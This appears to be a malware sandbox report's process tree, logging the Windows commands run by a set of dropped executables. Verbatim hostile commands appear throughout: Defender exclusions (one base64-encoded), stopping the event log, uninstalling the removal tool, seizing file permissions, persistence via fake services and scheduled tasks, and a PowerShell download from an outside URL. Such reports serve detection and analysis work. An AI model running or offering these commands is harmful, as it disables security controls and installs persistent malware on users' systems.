C:\Users\Admin\AppData\Local\Temp\FUT.au3
4⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5608

C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6100

C:\Users\Admin\AppData\Local\Temp\a\win1.exe
"C:\Users\Admin\AppData\Local\Temp\a\win1.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4392

C:\Users\Admin\AppData\Local\Temp\a\output.exe
"C:\Users\Admin\AppData\Local\Temp\a\output.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2360

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF"
3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:6732

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
- Suspicious use of WriteProcessMemory
PID:5556

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=E5444D30E377EB2AE4F120435E836C99 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=E5444D30E377EB2AE4F120435E836C99 --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:1
5⤵
PID:7324

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2DF0931F21BBCF253B341D049C31069C --mojo-platform-channel-handle=1904 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:7388

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EAF574A66DCB6520AA0E40C899D27978 --mojo-platform-channel-handle=2312 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:1052

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=F5DAF67A40D6BDF4EA6C84D456BC0C72 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=F5DAF67A40D6BDF4EA6C84D456BC0C72 --renderer-client-id=5 --mojo-platform-channel-handle=1976 --allow-no-sandbox-job /prefetch:1
5⤵
PID:3964

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4163D7B377DB2D1829A4E47DA9E53303 --mojo-platform-channel-handle=2816 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:3376

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D105695014EB621DAFEE8EE305A1E38F --mojo-platform-channel-handle=1988 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
5⤵
PID:6608

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
4⤵
PID:7092

C:\Users\Admin\AppData\Local\Temp\SIG.EXE
"C:\Users\Admin\AppData\Local\Temp\SIG.EXE"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:6928

C:\Users\Admin\AppData\Local\Temp\a\alabi.exe
"C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:6476

C:\Users\Admin\AppData\Local\Temp\a\crt.exe
"C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5168

C:\Users\Admin\AppData\Local\Temp\is-FUVD6.tmp\crt.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FUVD6.tmp\crt.tmp" /SL5="$10260,5149750,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:6896

C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
"C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -i
4⤵
- Executes dropped EXE
PID:5500

C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
"C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -s
4⤵
- Executes dropped EXE
PID:3456

C:\Users\Admin\AppData\Local\Temp\a\oiii.exe
"C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
PID:860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe" && icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
3⤵
PID:7440

C:\Windows\system32\takeown.exe
takeown /f "C:\Program Files\Windows Media Player\wmpnetwk.exe"
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:6332

C:\Windows\system32\icacls.exe
icacls "C:\Program Files\Windows Media Player\wmpnetwk.exe" /grant administrators:F
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6156

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own
3⤵
PID:7928

C:\Windows\system32\sc.exe
sc create "Accecss Auto Connetcion Manager" binPath= "C:\Program Files\Windows Media Player\wmixedwk.exe" START= auto DISPLAYNAME= "WebServer" TYPE= own
4⤵
- Launches sc.exe
PID:4384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\kkxqbh.bat" "
3⤵
PID:4980

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:7108

C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:6316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
3⤵
PID:4424

C:\Windows\system32\mode.com
mode 65,10
4⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p563741341569714296105326100 -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:5136

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6800

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6668

C:\Windows\system32\attrib.exe
attrib +H "svcshost.exe"
4⤵
- Views/modifies file attributes
PID:1804

C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe
"svcshost.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C powershell -EncodedCommand "PAAjADcARABsAEoAZgBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQwBVAFIARAA1AGwAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAxAEsAZABHACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagA4AGgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
5⤵
PID:2432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjADcARABsAEoAZgBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAQwBVAFIARAA1AGwAcQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwAxAEsAZABHACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAagA4AGgAIwA+AA=="
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5560

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
5⤵
PID:4712

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6651" /TR "C:\ProgramData\Dllhost\dllhost.exe"
5⤵
PID:3008

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6651" /TR "C:\ProgramData\Dllhost\dllhost.exe"
6⤵
- Creates scheduled task(s)
PID:5816

C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe
"C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6644

C:\Users\Admin\AppData\Local\Temp\katD433.tmp
C:\Users\Admin\AppData\Local\Temp\katD433.tmp
3⤵
- Executes dropped EXE
PID:7472

C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe
"C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3776

C:\Users\Admin\AppData\Local\Temp\katDA1F.tmp
C:\Users\Admin\AppData\Local\Temp\katDA1F.tmp
3⤵
- Executes dropped EXE
PID:2248

C:\Users\Admin\AppData\Local\Temp\a\inte.exe
"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:5268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit
3⤵
PID:4376

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "inte.exe" /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7048

C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
"C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5328

C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nseDB3A.tmp\abc.bat"
3⤵
PID:7608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7488

C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe
"C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:4568

C:\Windows\sysblardsv.exe
C:\Windows\sysblardsv.exe
3⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:368

C:\Users\Admin\AppData\Local\Temp\270914205.exe
C:\Users\Admin\AppData\Local\Temp\270914205.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:6772

C:\Windows\syslmgrsvc.exe
C:\Windows\syslmgrsvc.exe
5⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:7484

C:\Users\Admin\AppData\Local\Temp\744220930.exe
C:\Users\Admin\AppData\Local\Temp\744220930.exe
6⤵
- Executes dropped EXE
PID:3328

C:\Users\Admin\AppData\Local\Temp\1679313164.exe
C:\Users\Admin\AppData\Local\Temp\1679313164.exe
6⤵
- Executes dropped EXE
PID:7860

C:\Users\Admin\AppData\Local\Temp\2328932319.exe
C:\Users\Admin\AppData\Local\Temp\2328932319.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
PID:6192

C:\Windows\winqlsdrvcs.exe
C:\Windows\winqlsdrvcs.exe
5⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:216

C:\Users\Admin\AppData\Local\Temp\2466314816.exe
C:\Users\Admin\AppData\Local\Temp\2466314816.exe
6⤵
- Executes dropped EXE
PID:4328

C:\Users\Admin\AppData\Local\Temp\1202339053.exe
C:\Users\Admin\AppData\Local\Temp\1202339053.exe
6⤵
- Executes dropped EXE
PID:6728

C:\Users\Admin\AppData\Local\Temp\1346524297.exe
C:\Users\Admin\AppData\Local\Temp\1346524297.exe
4⤵
- Executes dropped EXE
PID:6208

C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
"C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
5⤵
- Executes dropped EXE
PID:760

C:\Users\Admin\AppData\Local\Temp\2269015714.exe
C:\Users\Admin\AppData\Local\Temp\2269015714.exe
4⤵
- Executes dropped EXE
PID:6424

C:\Users\Admin\AppData\Local\Temp\a\print.exe
"C:\Users\Admin\AppData\Local\Temp\a\print.exe"
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:7136

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
PID:6104

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
PID:2980

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
PID:6456

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
PID:7968

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
3⤵
- Launches sc.exe
PID:5760

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
3⤵
- Launches sc.exe
PID:7588

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:6164

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
3⤵
- Launches sc.exe
PID:2648

C:\Users\Admin\AppData\Local\Temp\a\222.exe
"C:\Users\Admin\AppData\Local\Temp\a\222.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:1420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
3⤵
PID:7316

C:\Windows\system32\mode.com
mode 65,10
4⤵
PID:7616

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p209313910271864811381312692 -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2556

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_8.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:7756

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6008

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5916

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5216

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4476

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7628

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:7216

C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5256

C:\Windows\system32\attrib.exe
attrib +H "Installer.exe"
4⤵
- Views/modifies file attributes
PID:7580

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
"Installer.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:6256

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
5⤵
PID:5096

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
6⤵
PID:5300

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
5⤵
PID:5992

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
5⤵
PID:5160

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
5⤵
PID:8032

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
5⤵
PID:1596

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OARKQOLE"
5⤵
- Launches sc.exe
PID:3464

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"
5⤵
- Launches sc.exe
PID:7876

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
5⤵
- Launches sc.exe
PID:1456

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OARKQOLE"
5⤵
- Launches sc.exe
PID:5816

C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe
"C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:7432

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"
3⤵
- Checks computer location settings
PID:6672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "
4⤵
PID:7524

C:\Windows\system32\reg.exe
C:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
5⤵
PID:5468

C:\Windows\SysWOW64\find.exe
find /i "Windows 7"
5⤵
PID:2952

C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:8168

C:\Windows\system32\Client.exe
"C:\Windows\system32\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1680

C:\Users\Admin\AppData\Local\Temp\a\reverse.exe
"C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"
2⤵
- Executes dropped EXE
PID:2144

